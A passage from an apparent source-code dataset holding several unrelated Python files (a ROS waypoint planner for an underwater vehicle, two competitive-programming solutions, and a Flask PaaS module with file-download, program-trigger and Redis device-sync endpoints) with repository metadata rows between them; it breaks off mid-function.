            self.nav_goal = None
    def __init__(self, name):
        """Publish yaw and depth setpoints based on waypoints.

        Reads all topics/tunables from private ROS params, wires up the
        publishers/subscribers and the goal-reached timer, starts the
        SimpleActionServer, and then blocks in rospy.spin().
        """
        self._action_name = name
        #self.heading_offset = rospy.get_param('~heading_offsets', 5.)
        self.wp_tolerance = rospy.get_param('~wp_tolerance', 5.)
        self.depth_tolerance = rospy.get_param('~depth_tolerance', 0.5)
        self.base_frame = rospy.get_param('~base_frame', "sam/base_link")
        rpm_cmd_topic = rospy.get_param('~rpm_cmd_topic', '/sam/core/rpm_cmd')
        heading_setpoint_topic = rospy.get_param('~heading_setpoint_topic', '/sam/ctrl/dynamic_heading/setpoint')
        yaw_pid_enable_topic = rospy.get_param('~yaw_pid_enable_topic', '/sam/ctrl/dynamic_heading/pid_enable')
        depth_setpoint_topic = rospy.get_param('~depth_setpoint_topic', '/sam/ctrl/dynamic_depth/setpoint')
        depth_pid_enable_topic = rospy.get_param('~depth_pid_enable_topic', '/sam/ctrl/dynamic_depth/pid_enable')
        self.forward_rpm = int(rospy.get_param('~forward_rpm', 1000))
        #related to turbo turn
        self.turbo_turn_flag = rospy.get_param('~turbo_turn_flag', False)
        thrust_vector_cmd_topic = rospy.get_param('~thrust_vector_cmd_topic', '/sam/core/thrust_vector_cmd')
        yaw_feedback_topic = rospy.get_param('~yaw_feedback_topic', '/sam/ctrl/yaw_feedback')
        self.turbo_angle_min_deg = rospy.get_param('~turbo_angle_min', 90)
        self.turbo_angle_min = np.radians(self.turbo_angle_min_deg)
        self.turbo_angle_max = 3.0
        self.flip_rate = rospy.get_param('~flip_rate', 0.5)
        self.rudder_angle = rospy.get_param('~rudder_angle', 0.08)
        self.turbo_turn_rpm = rospy.get_param('~turbo_turn_rpm', 1000)
        vbs_pid_enable_topic = rospy.get_param('~vbs_pid_enable_topic', '/sam/ctrl/vbs/pid_enable')
        vbs_setpoint_topic = rospy.get_param('~vbs_setpoint_topic', '/sam/ctrl/vbs/setpoint')
        #related to velocity regulation instead of rpm
        self.vel_ctrl_flag = rospy.get_param('~vel_ctrl_flag', False)
        self.vel_setpoint = rospy.get_param('~vel_setpoint', 0.5) #velocity setpoint in m/s
        self.roll_setpoint = rospy.get_param('~roll_setpoint', 0)
        vel_setpoint_topic = rospy.get_param('~vel_setpoint_topic', '/sam/ctrl/dynamic_velocity/u_setpoint')
        roll_setpoint_topic = rospy.get_param('~roll_setpoint_topic', '/sam/ctrl/dynamic_velocity/roll_setpoint')
        vel_pid_enable_topic = rospy.get_param('~vel_pid_enable_topic', '/sam/ctrl/dynamic_velocity/pid_enable')
        self.nav_goal = None
        self.listener = tf.TransformListener()
        rospy.Timer(rospy.Duration(0.5), self.timer_callback)
        self.yaw_feedback=0
        rospy.Subscriber(yaw_feedback_topic, Float64, self.yaw_feedback_cb)
        self.rpm_pub = rospy.Publisher(rpm_cmd_topic, ThrusterRPMs, queue_size=10)
        self.yaw_pub = rospy.Publisher(heading_setpoint_topic, Float64, queue_size=10)
        self.depth_pub = rospy.Publisher(depth_setpoint_topic, Float64, queue_size=10)
        self.vel_pub = rospy.Publisher(vel_setpoint_topic, Float64, queue_size=10)
        self.roll_pub = rospy.Publisher(roll_setpoint_topic, Float64, queue_size=10)
        #TODO make proper if it works.
        self.vbs_pub = rospy.Publisher(vbs_setpoint_topic, Float64, queue_size=10)
        self.yaw_pid_enable = rospy.Publisher(yaw_pid_enable_topic, Bool, queue_size=10)
        self.depth_pid_enable = rospy.Publisher(depth_pid_enable_topic, Bool, queue_size=10)
        self.vbs_pid_enable = rospy.Publisher(vbs_pid_enable_topic, Bool, queue_size=10)
        self.vel_pid_enable = rospy.Publisher(vel_pid_enable_topic, Bool, queue_size=10)
        self.vec_pub = rospy.Publisher(thrust_vector_cmd_topic, ThrusterAngles, queue_size=10)
        self.marker = Marker()
        self.marker_pub = rospy.Publisher('/sam/viz/wp_marker', Marker, queue_size=1)
        self._as = actionlib.SimpleActionServer(self._action_name, MoveBaseAction, execute_cb=self.execute_cb, auto_start = False)
        self._as.start()
        rospy.loginfo("Announced action server with name: %s", self._action_name)
        rospy.spin()
if __name__ == '__main__':
    # Entry point: register the ROS node, then construct the planner.
    # WPDepthPlanner.__init__ starts the action server and blocks in
    # rospy.spin(), so nothing runs after this line until shutdown.
    rospy.init_node('wp_depth_action_planner')
    planner = WPDepthPlanner(rospy.get_name())
| 10,698 | 4,335 | 23 |
4f1cf3c0ae52adf3586dbd9ace2922b02750dbca | 347 | py | Python | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | 2 | 2020-06-12T09:54:23.000Z | 2021-05-04T01:34:07.000Z | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | 961 | 2020-06-23T07:26:22.000Z | 2022-03-31T21:34:52.000Z | ABC/abc051-abc100/abc057/a.py | KATO-Hiro/AtCoder | cbbdb18e95110b604728a54aed83a6ed6b993fde | [
"CC0-1.0"
] | null | null | null | '''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
    # Input: two integers A B on one line — current hour and hours until start.
    current_hour, add_hour = list(map(int, input().split()))
    contest_hour = current_hour + add_hour
    # Wrap past midnight on a 24-hour clock (sum stays below 48 under the
    # contest's input constraints, so one subtraction suffices).
    if contest_hour < 24:
        print(contest_hour)
    else:
        print(contest_hour - 24)
| 15.086957 | 61 | 0.576369 | '''input
23 2
1
9 12
21
'''
# -*- coding: utf-8 -*-
# AtCoder Beginner Contest
# Problem A
if __name__ == '__main__':
    # Input: two integers A B on one line — current hour and hours until start.
    current_hour, add_hour = list(map(int, input().split()))
    contest_hour = current_hour + add_hour
    # Wrap past midnight on a 24-hour clock (sum stays below 48 under the
    # contest's input constraints, so one subtraction suffices).
    if contest_hour < 24:
        print(contest_hour)
    else:
        print(contest_hour - 24)
| 0 | 0 | 0 |
a0af9bffe8473b6c0d6be526c0dc67a6cfca8472 | 1,296 | py | Python | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | Number of Islands.py | sugia/leetcode | 6facec2a54d1d9f133f420c9bce1d1043f57ebc6 | [
"Apache-2.0"
] | null | null | null | '''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
| 23.563636 | 256 | 0.471451 | '''
Given a 2d grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are all surrounded by water.
Example 1:
Input:
11110
11010
11000
00000
Output: 1
Example 2:
Input:
11000
11000
00100
00011
Output: 3
'''
class Solution(object):
    def numIslands(self, grid):
        """Count the islands in a 2D grid of '1' (land) / '0' (water) cells.

        An island is a maximal group of '1' cells connected horizontally or
        vertically. Rows may be ragged; an empty grid yields 0.

        Fix: ``xrange`` (Python-2-only) replaced with ``range`` — identical
        iteration behavior on Python 2, and the code now also runs on Python 3.

        WARNING: the grid is modified in place — visited land cells are
        overwritten with '0', so the input is consumed by this call.

        :type grid: List[List[str]]
        :rtype: int
        """
        res = 0
        if not grid:
            return res
        for i in range(len(grid)):
            for j in range(len(grid[i])):
                if grid[i][j] == '1':
                    res += 1
                    self.fill(grid, i, j)
        return res

    def fill(self, grid, x, y):
        """Iteratively flood-fill the island containing (x, y), sinking cells to '0'."""
        vec = [(x, y)]
        while len(vec) > 0:
            tmpx, tmpy = vec.pop()
            grid[tmpx][tmpy] = '0'
            # Explore the four orthogonal neighbours; ragged rows are handled
            # by bounding each column check against its own row length.
            for i, j in [(1, 0), (-1, 0), (0, 1), (0, -1)]:
                tmpxx = tmpx + i
                tmpyy = tmpy + j
                if 0 <= tmpxx < len(grid) and 0 <= tmpyy < len(grid[tmpxx]):
                    if grid[tmpxx][tmpyy] == '1':
                        vec.append((tmpxx, tmpyy))
| 431 | 446 | 23 |
b9a37f549a9f2cd296ab398602fda182177dac33 | 24,050 | py | Python | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | original-paas/copy_to_container/www/spdpaas/src/app/features/customizedHandle.py | yishan1331/docker-practice | 91a1a434cbffc33790678af5e09de310386812d1 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
"""
自定义redis列表增量迭代
:param name: redis中的name,即:迭代name对应的列表
:return: yield 返回 列表元素
"""
list_count = r.llen(name)
for index in range(list_count):
yield r.lindex(name, index)
#}}}
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
# }}}
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
# }}}
#=======================================================
# 提供使用者生成下載檔案列表之id & pwd (gen_salt)
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案功能之id & pwd合法性
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
#}}}
#=======================================================
# 檢驗欲使用下載檔案的有效期限若超過則刪除
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Check/Delete/DownloadFiles/Deadline/<CRONTAB>', methods = ['GET'])
#}}}
#=======================================================
# 提供api觸發指定程式
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['GET']),
# Flask endpoint AND internal helper (selfUse=True skips all request handling).
# Runs an external program — either synchronously via subprocess, in a worker
# thread, or (Temp=True) through a celery task — and reports its output.
# NOTE(review): this module is Python 2 (print statements below); the APIINFO
# docstring is structured data served by the platform and is left untouched.
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Trigger/Specific/Program', methods = ['POST'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def trigger_specific_program(SYSTEM,selfUse=False,useThread=False,languages=None,programName=None,programData=None,Temp=False):
    #{{{APIINFO
    '''
    {
    "API_application":"提供觸發指定程式",
    "API_parameters":{"uid":"使用者帳號"},
    "API_path_parameters":{"SYSTEM":"合法的系統名稱"},
    "API_postData":{
        "bodytype":"Object",
        "bodyschema":"{}",
        "parameters":{
            "languages":{"type":"String","requirement":"required","directions":"欲觸發的程式語言類型","example":"php"},
            "programName":{"type":"String","requirement":"required","directions":"欲觸發的程式路徑加檔名","example":"/var/www/html/test.php"},
            "programData":{"type":"Unlimited","requirement":"optional","directions":"欲丟入觸發程式的參數資料","example":"test"}
        },
        "precautions":{
            "注意事項1":"languages目前只接受php語言",
            "注意事項2":"programName程式路徑必須存在"
        },
        "example":[
            {
                "languages":"php",
                "programName":"test.php",
                "programData":"123"
            }
        ]
    },
    "API_message_parameters":{"GetProgramResponse":"Unlimited+取得觸發程式回傳的值"},
    "API_example":{
        "Response": "ok",
        "APIS": "POST /api/IOT/1.0/Customized/Trigger/Specific/Program",
        "OperationTime": "3.020",
        "BytesTransferred": 223,
        "System": "IOT",
        "GetProgramResponse": "test"
    }
    }
    '''
    #}}}
    err_msg = "error"
    # Maps accepted language keys to the interpreter used to launch them
    # (C binaries are executed directly, hence the empty prefix).
    languages_config = {
        "php":"/usr/bin/php",
        "c":""
    }
    # HTTP path: validate the request and pull parameters from the JSON body.
    if not selfUse:
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        # if SYSTEM not in list(set(globalvar.SYSTEMLIST[globalvar.SERVERIP]).intersection(set(ACCESS_SYSTEM_LIST))):
        #     dicRet["Response"] = "system:{} has no privillege to use this API".format(SYSTEM)
        #     return jsonify( **dicRet)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
        if not VerifyDataStrLawyer(request.data).verify_json():
            dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
            return jsonify( **dicRet)
        reqdataDict = json.loads(request.data)
        # Body may be double-encoded JSON (a JSON string containing JSON).
        if isinstance(reqdataDict,type(u"")):
            reqdataDict = json.loads(reqdataDict)
        post_parameter = ["languages","programName","programData"]
        if not check_post_parameter_exist(reqdataDict,post_parameter):
            dicRet["Response"] = "Missing post parameters : '{}'".format(post_parameter)
            return jsonify( **dicRet)
        languages = reqdataDict.get("languages")
        programName = reqdataDict.get("programName")
        programData = reqdataDict.get("programData")
    # print "~~~~languages~~~~"
    # print languages
    # NOTE(review): the validation below references dicRet, which is only bound
    # when selfUse is False — an invalid language/path under selfUse=True would
    # raise NameError; presumably internal callers always pass valid values.
    if languages not in languages_config.keys():
        dicRet["Response"] = "Currently only php and C programs can be executed"
        return jsonify( **dicRet)
    # print "~~~~programName~~~~"
    # print programName
    # print "~~~~programData~~~~"
    # print programData
    # print type(programData)
    if isinstance(programData,dict): programData = json.dumps(programData)
    # print "~~~~programData~~~~"
    # print programData
    if not os.path.isfile(programName):
        dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(programName)
        return jsonify( **dicRet)
    # Build argv-style command: [interpreter, script, data] — shell=False later.
    cmd = [languages_config[languages],programName]
    if programData: cmd.append(programData)
    # cmd = "{}{}".format(languages_config[languages],programName)
    # if programData: cmd+=" '{}'".format(programData)
    # print "~~~cmd~~~"
    # print cmd
    try:
        if useThread:
            # Fire-and-forget: run the program in the background and return.
            # print "~~~~~trigger start~~~~~~"
            # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            if Temp:
                from celeryApp.celeryTasks import celery_trigger_specific_program
                celery_trigger_specific_program.apply_async(args=(cmd,SYSTEM), routing_key='high', queue="H-queue1")
            else:
                worker = TriggerProgramWorkerThread(os.getpid(), lock, subprocess_check_output_program, cmd, SYSTEM)
                worker.start()
            # print "~~~~~trigger over~~~~~~"
            # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            err_msg = "ok"
            return
        else:
            # Synchronous run; C binaries drop the (empty) interpreter prefix.
            if languages == "c": cmd.pop(0)
            # print "!!!!!!!!!!!!!!!!!"
            dicRet["StartProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            process = subprocess_check_output_program(ConvertData().convert(cmd),SYSTEM)
            # print "~~~~process~~~~"
            # print process
            # print "~~~~type process~~~~"
            # print type(process)
            dicRet["EndProgramTime"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S')
            # print "!!!!!!!!!!!!!!!!!"
            # process is (ok_flag, stdout_or_errmsg, detail_dict).
            if process[0]:
                dicRet["GetProgramResponse"] = {"output":process[1],"returncode":0}
                err_msg = "ok"
            else:
                # print process[2]
                # Strip the raw cmd from the error detail before returning it.
                del process[2]["cmd"]
                dicRet["GetProgramResponse"] = process[2]
                err_msg = "error"
    except Exception as e:
        print "~~~Exception~~~"
        print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
        print e
        print sys.exc_info()
    finally:
        if not selfUse:
            # dicRet["THISTIME"] = datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
            dicRet["Response"] = err_msg
            return jsonify(**dicRet)
#}}}
#=======================================================
# Definition: For IoT 初始化IoT所需的redis mes_device_status keys(hash) from mysql table:
# Date: 12292020@Yishan
#=======================================================
# {{{def iot_redis_device_keys_init(SYSTEM)
@CUSTOMIZED_API.route('/api/<SYSTEM>/1.0/Customized/Init/Redis/Device/Keys', methods = ['GET'])
@docstring_parameter(ACCESS_SYSTEM_LIST=ACCESS_SYSTEM_LIST)
def iot_redis_device_keys_init(SYSTEM, selfUse=False):
    """
    For IoT: initialize the redis device-status keys (hashes) from the MySQL
    ``preload`` table, then reconcile existing redis hashes field-by-field
    (add new fields, drop stale ones, delete obsolete mes_device_status_* keys).
    Args:
        SYSTEM: name of the system to initialize (also selects the redis DB)
        selfUse: when True, skip all HTTP request/response handling
    Returns:
        no return (HTTP mode returns a jsonify'd status dict)
    """
    # HTTP path: validate the request before touching any datastore.
    if not selfUse:
        dicRet = appPaaS.preProcessRequest(request,system=SYSTEM)
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
    all_device = {}
    err_msg = "error"
    # Phase 1: load the desired device hashes from the SQL `preload` table.
    try:
        DbSession,metadata,engine= appPaaS.getDbSessionType(system=SYSTEM)
        if DbSession is None:
            return
        sess = DbSession()
        queryTable = Table("preload" , metadata, autoload=True)
        for row in sess.query(queryTable).all():
            drow = AdjustDataFormat().format(row._asdict())
            # Redis key is "<main_key>_<combine_key>"; value is the JSON-decoded
            # field map stored in combine_list.
            all_device[drow["main_key"]+"_"+drow["combine_key"]] = json.loads(drow["combine_list"])
        err_msg = "ok" #done successfully
        # http://stackoverflow.com/questions/4112337/regular-expressions-in-sqlalchemy-queries
    except Exception as e:
        err_msg = appPaaS.catch_exception(e,sys.exc_info(),SYSTEM)
    finally:
        # Always release SQL resources; bail out early if phase 1 failed.
        if 'DbSession' in locals().keys() and DbSession is not None:
            sess.close()
            DbSession.remove()
            engine.dispose()
        if err_msg != "ok":
            if selfUse: return
            if not selfUse:
                dicRet["Response"] = err_msg
                return jsonify( **dicRet)
    err_msg = "error"
    # Phase 2: reconcile redis with the loaded table contents.
    try:
        # Redis DB index mirrors the system's position in SYSTEMLIST.
        redis_db = globalvar.SYSTEMLIST[globalvar.SERVERIP].index(SYSTEM)
        dbRedis,_,_ = appPaaS.getDbSessionType(system=SYSTEM,dbName=redis_db,forRawData="redis")
        if dbRedis is None:
            return
        for key,value in all_device.items():
            # Key missing: create the whole hash in one shot.
            if not dbRedis.exists(key):
                dbRedis.hmset(key, value)
            # Key exists: diff its fields against the new value object.
            else:
                # Set difference: stale fields in redis but not in the new value -> delete.
                fields_need_del = list(set(dbRedis.hkeys(key)).difference(value.keys()))
                if fields_need_del: dbRedis.hdel(key, *fields_need_del)
                # Set difference: new fields missing from redis -> add.
                fields_need_add = list(set(value.keys()).difference(dbRedis.hkeys(key)))
                if fields_need_add:
                    for value_key,value_value in value.items():
                        if value_key in fields_need_add:
                            dbRedis.hset(key, value_key, value_value)
        # Delete mes_device_status_* keys that no longer appear in the table.
        keys_need_del = list(set(dbRedis.keys("mes_device_status_*")).difference(all_device.keys()))
        if keys_need_del: dbRedis.delete(*keys_need_del)
        err_msg = "ok"
    except Exception as e:
        err_msg = appPaaS.catch_exception(e, sys.exc_info(), SYSTEM)
    finally:
        if not selfUse:
            dicRet["Response"] = err_msg
            return jsonify( **dicRet)
#}}} | 38.235294 | 142 | 0.57052 | # -*- coding: utf-8 -*-
#Department Module Description
"""
==============================================================================
created : 03/20/2017
Last update: 02/08/2021
Developer: Wei-Chun Chang
Lite Version 2 @Yishan08212019
API version 1.0
Filename: customizedHandle.py
Description: basically, all writes to the module will be opened to superuser only, for others, can only query data
1. register a department
2. query Department basic info.
3. query Department members
4. query Department sensors
Total = 6 APIs
==============================================================================
"""
#=======================================================
# System level modules
#=======================================================
#{{{
from sqlalchemy import *
from werkzeug.security import gen_salt
import subprocess #Yishan 05212020 subprocess 取代 os.popen
# import threading
#}}}
#=======================================================
# User level modules
#=======================================================
#{{{
from app import *
#Yishan@05212020 added for common modules
from app.modules import *
#}}}
__all__ = ('trigger_specific_program','iot_redis_device_keys_init')
ACCESS_SYSTEM_LIST = ["IOT"]
# # 建立 thread lock
# lock = threading.Lock()
#blueprint
CUSTOMIZED_API = Blueprint('CUSTOMIZED_API', __name__)
#{{{ def _list_iter(name)
def _list_iter(r,name):
    """
    Incrementally iterate a Redis list (custom generator).
    :param r: redis client handle (must provide ``llen`` and ``lindex``)
    :param name: redis key name; the list stored at *name* is iterated
    :return: yields the list's elements one at a time, in index order
    """
    list_count = r.llen(name)
    for index in range(list_count):
        yield r.lindex(name, index)
#}}}
class TriggerProgramWorkerThread(threading.Thread):
    """Background worker that runs func(cmd, SYSTEM) on its own thread.

    Used by trigger_specific_program for fire-and-forget execution of an
    external program. The lock is stored but locking is currently disabled
    (see commented-out acquire/release in run()).
    NOTE(review): `threading` is not imported at the top of this file (the
    import is commented out) — presumably it arrives via `from app import *`;
    confirm.
    """
    def __init__(self, pid, lock, func, cmd, SYSTEM):
        """Capture the callable and its arguments; pid is used only for logging."""
        threading.Thread.__init__(self)
        self.pid = pid
        self.func = func
        self.lock = lock
        self.cmd = cmd
        self.SYSTEM = SYSTEM
    def run(self):
        """Thread body: invoke the stored callable once, then exit."""
        # acquire lock (disabled)
        # self.lock.acquire()
        # print "@@@@@@@@@@@@@@@@@@@@@@@TriggerProgram@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
        # print "------Lock-----",self.pid
        # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::],self.pid
        # print "Lock acquired by pid %d" % self.pid
        # print "------threading detail------",os.getpid()
        # print threading.active_count() # how many threads are alive right now
        # print threading.current_thread().name # which thread we are running in
        self.func(self.cmd,self.SYSTEM)
        # release lock (disabled)
        # self.lock.release()
        # print "------released Lock-----",self.pid
        # print "Lock released by pid %d" % self.pid
        # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::],self.pid
        # print "------threading detail------",os.getpid()
        # print threading.active_count() # how many threads are alive right now
        # print threading.current_thread().name # which thread we are running in
        # print "@@@@@@@@@@@@@@@@@@@@@@@TriggerProgram end@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@"
        # print
#=======================================================
# subprocess_check_output_program
# Date: 12142020@Yishan
# https://www.coder.work/article/3210794
# https://stackoverflow.com/questions/31683320/suppress-stderr-within-subprocess-check-output
#=======================================================
# {{{ def subprocess_check_output_program(cmd)
def subprocess_check_output_program(cmd,SYSTEM):
    """Run *cmd* (argv list, shell=False) and capture its stdout.

    stderr is discarded via os.devnull. Returns a 3-tuple:
      success: (True, stdout, {"returncode": 0})
      failure: (False, formatted-error-message, e.__dict__ of the
               CalledProcessError — includes returncode/output/cmd)
    NOTE(review): the except branch uses Python-2 print statements; this
    module is Python 2.
    """
    try:
        # print "------func------",os.getpid()
        # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
        # print cmd
        # process = subprocess.check_output(cmd,shell=False,stderr=subprocess.STDOUT)
        with open(os.devnull, 'w') as devnull:
            process = subprocess.check_output(cmd,shell=False,stderr=devnull)
        # with subprocess.Popen(cmd, shell=False, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as proc:
        # process = subprocess.Popen(cmd, shell=False, stdout=devnull, stderr=devnull)
        # result = process.stdout.readlines()
        # print "process.pid-> ",process.pid
        # print process
        # print "result-> ",result
        # print os.getpid(),"~~~~subprocess_check_output_program~~~~",process
        # print "------------------"
        # print datetime.now().strftime('%Y-%m-%d %H:%M:%S.%f')[::]
        # print "======================="
        return True,process,{"returncode":0}
    except subprocess.CalledProcessError as e:
        print "~~~~e~~~~"
        print e.__dict__
        return False,appPaaS.catch_exception(e,sys.exc_info(),SYSTEM),e.__dict__
#=======================================================
# 列出/var/www/html/download/files內所有檔案
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Show/DownloadFiles', methods = ['GET'])
def show_downloadfiles(selfUse=False):
    """List all files under /var/www/html/download/files.

    HTTP mode (selfUse=False): validates the request (uid required) and
    returns a jsonify'd dict with "FileList" and "Response" ("ok"/error).
    Internal mode (selfUse=True): returns the plain list of file names.
    A listdir failure yields an empty list plus the formatted error message.
    """
    err_msg = "ok"
    FILEPATH = "/var/www/html/download/files"
    if not selfUse:
        dicRet = appPaaS.preProcessRequest(request,system="PaaS")
        uri_parameter = ["uid"]
        result, result_msg = check_uri_parameter_exist(request,uri_parameter)
        if not result:
            dicRet["Response"] = result_msg
            return jsonify( **dicRet)
    fileList = []
    try:
        # NOTE: os.listdir also returns subdirectory names, not only files.
        fileList = [f for f in os.listdir(FILEPATH)]
    except Exception as e:
        err_msg = appPaaS.catch_exception(e,sys.exc_info(),"PaaS")
    if not selfUse:
        dicRet["FileList"] = fileList
        dicRet["Response"] = err_msg
        return jsonify( **dicRet)
    return fileList
# }}}
#=======================================================
# Generate the id & pwd pair (via gen_salt) granting a user access to a
# download-file list
# Date: 12142020@Yishan
#=======================================================
# {{{ CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST']),
@CUSTOMIZED_API.route('/api/PaaS/1.0/Customized/Create/DownloadFiles/IdPwd', methods = ['POST'])
@decorator_check_content_type(request)
def create_downloadfiles_idpwd():
    """Create a one-off id/pwd pair (gen_salt) granting download access to
    a posted list of file names under /var/www/html/download/files.

    Redis layout (db 15):
      * "<ID>_<PWD>" -- redis list of the requested file names, TTL 86400s.
      * "rederence_point" -- hash mapping file name -> JSON list of the
        "<ID>_<PWD>" keys referencing it; expires at 00:30 two days out.

    Returns a JSON response carrying ID, PWD and DownloadList on success.
    """
    err_msg = "ok"
    dicRet = appPaaS.preProcessRequest(request,system="PaaS")
    uri_parameter = ["uid"]
    result, result_msg = check_uri_parameter_exist(request,uri_parameter)
    if not result:
        dicRet["Response"] = result_msg
        return jsonify( **dicRet)
    if not VerifyDataStrLawyer(request.data).verify_json():
        dicRet["Response"] = "error input '{}' is illegal JSON".format(request.data)
        return jsonify( **dicRet)
    reqdataList = ConvertData().convert(json.loads(request.data))
    if not isinstance(reqdataList,list):
        dicRet["Response"] = "post data必須傳陣列"
        return jsonify( **dicRet)
    FILEPATH = "/var/www/html/download/files/"
    # Verify every posted file name is a string and actually exists on disk.
    for i in reqdataList:
        if not isinstance(i,str):
            dicRet["Response"] = "'{}' 必須為字串".format(i)
            return jsonify( **dicRet)
        if not os.path.isfile(os.path.join(FILEPATH,i)):
            dicRet["Response"] = "{} 檔案不存在或路徑有誤".format(i)
            return jsonify( **dicRet)
    ID = gen_salt(24)
    PWD = gen_salt(48)
    recList = []  # NOTE(review): never used below -- candidate for removal
    try:
        dbRedis,_,result= appPaaS.getDbSessionType(system="PaaS",dbName=15,forRawData="redis")
        if dbRedis is None:
            # A None handle means the redis connection could not be established.
            dicRet["Response"] = result
            return jsonify( **dicRet)
        redis_key = ID+"_"+PWD
        # Reference-hash expiry baseline: 00:30 of the day after tomorrow.
        rederence_extime = int(time.mktime(time.strptime(str(date.today() + timedelta(days=2))+" 00:30:00", '%Y-%m-%d %H:%M:%S')))
        redishash_already_set_expireat = False
        # If the reference hash already exists with less than two days
        # (172800s) left, push its expiry out to the new baseline.
        if dbRedis.exists("rederence_point"):
            if dbRedis.ttl("rederence_point") < 172800:
                dbRedis.expireat("rederence_point",rederence_extime)
                redishash_already_set_expireat = True
        # rederence_point layout: {"filename": [redis_key, ...]}
        # Create the "<ID>_<PWD>" list; in the (theoretically impossible)
        # event the key already exists, regenerate until it is free.
        if dbRedis.llen(redis_key) != 0:
            status = True
            while status:
                redis_key = str(gen_salt(24))+"_"+str(gen_salt(48))
